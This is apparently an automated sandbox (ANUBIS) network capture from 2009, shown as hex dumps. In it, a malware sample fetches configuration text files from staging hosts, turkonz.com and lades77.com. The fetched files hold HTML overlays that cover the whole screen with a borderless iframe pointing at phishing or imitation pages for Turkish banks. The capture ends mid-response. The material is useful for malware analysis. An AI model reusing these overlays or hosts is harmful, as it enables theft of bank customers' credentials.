3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2053 756e 2c20 3135 204d    ified: Sun, 15 M
6172 2032 3030 3920 3138 3a35 353a 3534    ar 2009 18:55:54
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 352d 3139 642d 3436 3532 6365 3232    055-19d-4652ce22
3663 3238 3022 0d0a 4163 6365 7074 2d52    6c280"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6f6e 6c69 6e65 6973 6c65 6d6c 6572 2e6f    onlineislemler.o
7267 2f69 7362 616e 6b2f 696e 6465 782e    rg/isbank/index.
7068 7022 200d 0a77 6964 7468 3d31 3030    php" ..width=100
250d 0a68 6569 6768 743d 3130 3025 2020    %..height=100%  
6d61 7267 696e 6865 6967 6874 3d22 3022    marginheight="0"
206d 6172 6769 6e77 6964 7468 3d22 3022     marginwidth="0"
2020 7363 726f 6c6c 696e 673d 226e 6f22      scrolling="no"
200d 0a62 6f72 6465 723d 2230 2220 0d0a     ..border="0" ..
6672 616d 6562 6f72 6465 723d 2230 2220    frameborder="0" 
0d0a 746f 703d 2230 2220 6c65 6674 3d22    ..top="0" left="
3022 3e0d 0a59 6f75 7220 6272 6f77 7365    0">..Your browse
7220 646f 6573 206e 6f74 2073 7570 706f    r does not suppo
7274 2069 6e6c 696e 6520 6672 616d 6573    rt inline frames
206f 7220 6973 2063 7572 7265 6e74 6c79     or is currently
2063 6f6e 6669 6775 7265 6420 0d0a 6e6f     configured ..no
7420 746f 2064 6973 706c 6179 2069 6e6c    t to display inl
696e 6520 6672 616d 6573 2e0d 0a3c 2f49    ine frames...</I
4652 414d 453e 3c2f 6469 763e              FRAME></div>

from ANUBIS:1038 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 630

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7661    GET /img/jpg/yva
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3238 3a34 3120 474d 540d 0a41 6363    4:28:41 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3165 3565 3831    s..ETag: "1e5e81
3131 3337 6463 3931 3a61 6439 6663 220d    1137dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3136 2047 4d54 0d0a    9 11:01:16 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 7661 6b2e 7478 74                js/yvak.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7661    GET /img/jpg/yva
6b2e 7478 7420 4854 5450 2f31 2e31 0d0a    k.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3238 3a34 3120 474d 540d 0a41 6363    4:28:41 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3165 3565 3831    s..ETag: "1e5e81
3131 3337 6463 3931 3a61 6439 6663 220d    1137dc91:ad9fc".
0a53 6572 7665 723a 204d 6963 726f 736f    .Server: Microso
6674 2d49 4953 2f36 2e30 0d0a 582d 506f    ft-IIS/6.0..X-Po
7765 7265 642d 4279 3a20 506c 6573 6b57    wered-By: PleskW
696e 0d0a 582d 506f 7765 7265 642d 4279    in..X-Powered-By
3a20 4153 502e 4e45 540d 0a44 6174 653a    : ASP.NET..Date:
2046 7269 2c20 3230 204d 6172 2032 3030     Fri, 20 Mar 200
3920 3131 3a30 313a 3137 2047 4d54 0d0a    9 11:01:17 GMT..
0d0a 6874 7470 3a2f 2f77 7777 2e6c 6164    ..http://www.lad
6573 3737 2e63 6f6d 2f69 6d61 6765 732f    es77.com/images/
6a73 2f79 7661 6b2e 7478 74                js/yvak.txt

from ANUBIS:1039 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 751

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7661 6b2e 7478 7420 4854 5450 2f31 2e31    vak.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3139    ar 2009 11:01:19
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2053 756e 2c20 3135 204d    ified: Sun, 15 M
6172 2032 3030 3920 3138 3a35 353a 3535    ar 2009 18:55:55
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 652d 3161 302d 3436 3532 6365 3233    05e-1a0-4652ce23
3630 3463 3022 0d0a 4163 6365 7074 2d52    604c0"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3431    ntent-Length: 41
360d 0a43 6f6e 7465 6e74 2d54 7970 653a    6..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
6f6e 6c69 6e65 6973 6c65 6d6c 6572 2e6f    onlineislemler.o
7267 2f76 616b 6966 6261 6e6b 2f69 6e64    rg/vakifbank/ind
6578 2e70 6870 2220 0d0a 7769 6474 683d    ex.php" ..width=
3130 3025 0d0a 6865 6967 6874 3d31 3030    100%..height=100
2520 206d 6172 6769 6e68 6569 6768 743d    %  marginheight=
2230 2220 6d61 7267 696e 7769 6474 683d    "0" marginwidth=
2230 2220 2073 6372 6f6c 6c69 6e67 3d22    "0"  scrolling="
6e6f 2220 0d0a 626f 7264 6572 3d22 3022    no" ..border="0"
200d 0a66 7261 6d65 626f 7264 6572 3d22     ..frameborder="
3022 200d 0a74 6f70 3d22 3022 206c 6566    0" ..top="0" lef
743d 2230 223e 0d0a 596f 7572 2062 726f    t="0">..Your bro
7773 6572 2064 6f65 7320 6e6f 7420 7375    wser does not su
7070 6f72 7420 696e 6c69 6e65 2066 7261    pport inline fra
6d65 7320 6f72 2069 7320 6375 7272 656e    mes or is curren
746c 7920 636f 6e66 6967 7572 6564 200d    tly configured .
0a6e 6f74 2074 6f20 6469 7370 6c61 7920    .not to display 
696e 6c69 6e65 2066 7261 6d65 732e 0d0a    inline frames...
3c2f 4946 5241 4d45 3e3c 2f64 6976 3e      </IFRAME></div>

from ANUBIS:1040 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 316 - Transferred inbound Bytes: 632

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7a69    GET /img/jpg/yzi
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a35 3020 474d 540d 0a41 6363    4:24:50 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3434 6435 3335    s..ETag: "44d535
3838 3132 3764 6339 313a 6164 3966 6322    88127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a32 3020 474d 540d    09 11:01:20 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 797a 6972 2e74 7874              /js/yzir.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 7a69    GET /img/jpg/yzi
722e 7478 7420 4854 5450 2f31 2e31 0d0a    r.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a    ww.turkonz.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2034 310d 0a43 6f6e 7465 6e74 2d54 7970     41..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a35 3020 474d 540d 0a41 6363    4:24:50 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3434 6435 3335    s..ETag: "44d535
3838 3132 3764 6339 313a 6164 3966 6322    88127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a32 3220 474d 540d    09 11:01:22 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 797a 6972 2e74 7874              /js/yzir.txt

from ANUBIS:1041 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 160 - Transferred inbound Bytes: 738

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
7a69 722e 7478 7420 4854 5450 2f31 2e31    zir.txt HTTP/1.1
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
7465 7874 2f68 746d 6c0d 0a48 6f73 743a    text/html..Host:
2077 7777 2e6c 6164 6573 3737 2e63 6f6d     www.lades77.com
0d0a 4163 6365 7074 3a20 7465 7874 2f68    ..Accept: text/h
746d 6c2c 202a 2f2a 0d0a 5573 6572 2d41    tml, */*..User-A
6765 6e74 3a20 4d6f 7a69 6c6c 612f 332e    gent: Mozilla/3.
3020 2863 6f6d 7061 7469 626c 653b 2049    0 (compatible; I
6e64 7920 4c69 6272 6172 7929 0d0a 0d0a

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3233    ar 2009 11:01:23
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 363a 3536    an 2009 04:16:56
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3036 302d 3139 332d 3436 3131 6561 3864    060-193-4611ea8d
3039 6530 3022 0d0a 4163 6365 7074 2d52    09e00"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
330d 0a43 6f6e 7465 6e74 2d54 7970 653a    3..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7a69 7261 6174 6261 6e6b 2e63 6f6d 2f69    ziraatbank.com/i
6e64 6578 2e68 746d 6c22 200d 0a77 6964    ndex.html" ..wid
7468 3d31 3030 250d 0a68 6569 6768 743d    th=100%..height=
3130 3025 2020 6d61 7267 696e 6865 6967    100%  marginheig
6874 3d22 3022 206d 6172 6769 6e77 6964    ht="0" marginwid
7468 3d22 3022 2020 7363 726f 6c6c 696e    th="0"  scrollin
673d 226e 6f22 200d 0a62 6f72 6465 723d    g="no" ..border=
2230 2220 0d0a 6672 616d 6562 6f72 6465    "0" ..frameborde
723d 2230 2220 0d0a 746f 703d 2230 2220    r="0" ..top="0" 
6c65 6674 3d22 3022 3e0d 0a59 6f75 7220    left="0">..Your 
6272 6f77 7365 7220 646f 6573 206e 6f74    browser does not
2073 7570 706f 7274 2069 6e6c 696e 6520     support inline 
6672 616d 6573 206f 7220 6973 2063 7572    frames or is cur
7265 6e74 6c79 2063 6f6e 6669 6775 7265    rently configure
6420 0d0a 6e6f 7420 746f 2064 6973 706c    d ..not to displ
6179 2069 6e6c 696e 6520 6672 616d 6573    ay inline frames
2e0d 0a3c 2f49 4652 414d 453e 3c2f 6469    ...</IFRAME></di
763e                                       v>

from ANUBIS:1042 to 78.111.96.8:80

State: Normal establishment and termination - Transferred outbound Bytes: 312 - Transferred inbound Bytes: 628

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 742e    GET /img/jpg/yt.
7478 7420 4854 5450 2f31 2e31 0d0a 436f    txt HTTP/1.1..Co
6e74 656e 742d 5479 7065 3a20 7465 7874    ntent-Type: text
2f68 746d 6c0d 0a48 6f73 743a 2077 7777    /html..Host: www
2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a 4163    .turkonz.com..Ac
6365 7074 3a20 7465 7874 2f68 746d 6c2c    cept: text/html,
202a 2f2a 0d0a 5573 6572 2d41 6765 6e74     */*..User-Agent
3a20 4d6f 7a69 6c6c 612f 332e 3020 2863    : Mozilla/3.0 (c
6f6d 7061 7469 626c 653b 2049 6e64 7920    ompatible; Indy 
4c69 6272 6172 7929 0d0a 0d0a              Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2033 390d 0a43 6f6e 7465 6e74 2d54 7970     39..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a30 3220 474d 540d 0a41 6363    4:24:02 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3461 3135 3731    s..ETag: "4a1571
3662 3132 3764 6339 313a 6164 3966 6322    6b127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a32 3420 474d 540d    09 11:01:24 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 2e74 7874                   /js/yt.txt

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f79 742e    GET /img/jpg/yt.
7478 7420 4854 5450 2f31 2e31 0d0a 436f    txt HTTP/1.1..Co
6e74 656e 742d 5479 7065 3a20 7465 7874    ntent-Type: text
2f68 746d 6c0d 0a48 6f73 743a 2077 7777    /html..Host: www
2e74 7572 6b6f 6e7a 2e63 6f6d 0d0a 4163    .turkonz.com..Ac
6365 7074 3a20 7465 7874 2f68 746d 6c2c    cept: text/html,
202a 2f2a 0d0a 5573 6572 2d41 6765 6e74     */*..User-Agent
3a20 4d6f 7a69 6c6c 612f 332e 3020 2863    : Mozilla/3.0 (c
6f6d 7061 7469 626c 653b 2049 6e64 7920    ompatible; Indy 
4c69 6272 6172 7929 0d0a 0d0a              Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a43 6f6e 7465 6e74 2d4c 656e 6774 683a    .Content-Length:
2033 390d 0a43 6f6e 7465 6e74 2d54 7970     39..Content-Typ
653a 2074 6578 742f 706c 6169 6e0d 0a4c    e: text/plain..L
6173 742d 4d6f 6469 6669 6564 3a20 4672    ast-Modified: Fr
692c 2032 3320 4a61 6e20 3230 3039 2030    i, 23 Jan 2009 0
343a 3234 3a30 3220 474d 540d 0a41 6363    4:24:02 GMT..Acc
6570 742d 5261 6e67 6573 3a20 6279 7465    ept-Ranges: byte
730d 0a45 5461 673a 2022 3461 3135 3731    s..ETag: "4a1571
3662 3132 3764 6339 313a 6164 3966 6322    6b127dc91:ad9fc"
0d0a 5365 7276 6572 3a20 4d69 6372 6f73    ..Server: Micros
6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3031 3a32 3520 474d 540d    09 11:01:25 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7974 2e74 7874                   /js/yt.txt

from ANUBIS:1043 to 66.147.242.99:80

State: Normal establishment and termination - Transferred outbound Bytes: 158 - Transferred inbound Bytes: 741

Data sent:

    
4745 5420 2f69 6d61 6765 732f 6a73 2f79    GET /images/js/y
742e 7478 7420 4854 5450 2f31 2e31 0d0a    t.txt HTTP/1.1..
436f 6e74 656e 742d 5479 7065 3a20 7465    Content-Type: te
7874 2f68 746d 6c0d 0a48 6f73 743a 2077    xt/html..Host: w
7777 2e6c 6164 6573 3737 2e63 6f6d 0d0a    ww.lades77.com..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 5573 6572 2d41 6765    l, */*..User-Age
6e74 3a20 4d6f 7a69 6c6c 612f 332e 3020    nt: Mozilla/3.0 
2863 6f6d 7061 7469 626c 653b 2049 6e64    (compatible; Ind
7920 4c69 6272 6172 7929 0d0a 0d0a         y Library)....

Data received:

    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a30 313a 3237    ar 2009 11:01:27
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e31 3120 2855 6e69    ache/2.2.11 (Uni
7829 206d 6f64 5f73 736c 2f32 2e32 2e31    x) mod_ssl/2.2.1
3120 4f70 656e 5353 4c2f 302e 392e 3869    1 OpenSSL/0.9.8i
2044 4156 2f32 206d 6f64 5f61 7574 685f     DAV/2 mod_auth_
7061 7373 7468 726f 7567 682f 322e 3120    passthrough/2.1 
6d6f 645f 6277 6c69 6d69 7465 642f 312e    mod_bwlimited/1.
3420 4672 6f6e 7450 6167 652f 352e 302e    4 FrontPage/5.0.
322e 3236 3335 0d0a 4c61 7374 2d4d 6f64    2.2635..Last-Mod
6966 6965 643a 2046 7269 2c20 3233 204a    ified: Fri, 23 J
616e 2032 3030 3920 3034 3a31 353a 3438    an 2009 04:15:48
2047 4d54 0d0a 4554 6167 3a20 2236 3038     GMT..ETag: "608
3035 392d 3139 362d 3436 3131 6561 3463    059-196-4611ea4c
3330 3530 3022 0d0a 4163 6365 7074 2d52    30500"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3430    ntent-Length: 40
360d 0a43 6f6e 7465 6e74 2d54 7970 653a    6..Content-Type:
2074 6578 742f 706c 6169 6e0d 0a0d 0a3c     text/plain....<
6469 7620 7374 796c 653d 2270 6f73 6974    div style="posit
696f 6e3a 2061 6273 6f6c 7574 653b 207a    ion: absolute; z
2d69 6e64 6578 3a20 343b 206c 6566 743a    -index: 4; left:
2030 7078 3b20 746f 703a 2031 7078 3b20     0px; top: 1px; 
0d0a 6865 6967 6874 3a37 3537 7078 2220    ..height:757px" 
6964 3d22 6c61 7965 7235 223e 0d0a 3c49    id="layer5">..<I
4652 414d 4520 6e61 6d65 3d49 3120 0d0a    FRAME name=I1 ..
7372 633d 2268 7474 703a 2f2f 7777 772e    src="http://www.
7462 616e 6b2e 636f 6d2e 7472 2f74 722d    tbank.com.tr/tr-
5452 2f69 6e64 6578 2e61 7370 2220 0d0a    TR/index.asp" ..
7769 6474 683d 3130 3025 0d0a 6865 6967    width=100%..heig
6874 3d31 3030 2520 206d 6172 6769 6e68    ht=100%  marginh
6569 6768 743d 2230 2220 6d61 7267 696e    eight="0" margin
7769 6474 683d 2230 2220 2073 6372 6f6c    width="0"  scrol
6c69 6e67 3d22 6e6f 2220 0d0a 626f 7264    ling="no" ..bord
6572 3d22 3022 200d 0a66 7261 6d65 626f    er="0" ..framebo
7264 6572 3d22 3022 200d 0a74 6f70 3d22    rder="0" ..top="
3022 206c 6566 743d 2230 223e 0d0a 596f    0" left="0">..Yo
7572 2062 726f 7773 6572 2064 6f65 7320    ur browser does 
6e6f 7420 7375 7070 6f72 7420 696e 6c69    not support inli
6e65 2066 7261 6d65 7320 6f72 2069 7320    ne frames or is 
6375 7272 656e 746c 7920 636f 6e66 6967    currently config
